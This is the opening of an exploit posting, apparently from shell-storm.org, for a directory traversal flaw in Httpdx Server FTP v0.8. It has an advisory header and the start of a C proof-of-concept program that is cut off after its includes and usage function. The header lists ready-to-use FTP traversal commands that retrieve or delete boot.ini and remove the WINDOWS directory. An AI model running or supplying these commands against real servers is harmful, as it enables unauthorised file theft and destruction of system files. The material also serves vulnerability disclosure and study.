/* Httpdx Server FTP v0.8 Remote Arbitrary Directories & files Vulnerability ------------------------------------------------------------------------- Arbitrary: ---------- The vulnerability is caused due to an input validation error when processing FTP requests. This can be exploited to read, modify, or delete arbitrary files from the affected system via directory traversal attacks. -------------------------------------------------------------------------------------------------------- FTP Service: ------------ You can delet file boot.ini => DELE ../../boot.ini You can get file boot.ini => RETR ../../boot.ini You can creat Directory => MKD ../../poc You can delet Directory => RMD ../../WINDOWS Author: Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org */ #include "stdio.h" #include "unistd.h" #include "stdlib.h" #include "sys/types.h" #include "sys/socket.h" #include "netinet/in.h" int syntax(char *file) { fprintf(stderr,"\nHttpdx Server FTP v0.8 Arbitrary Directories & files\n"); fprintf(stderr,"-------------------------------------------------------\n"); fprintf(stderr,"=>Syntax : <%s>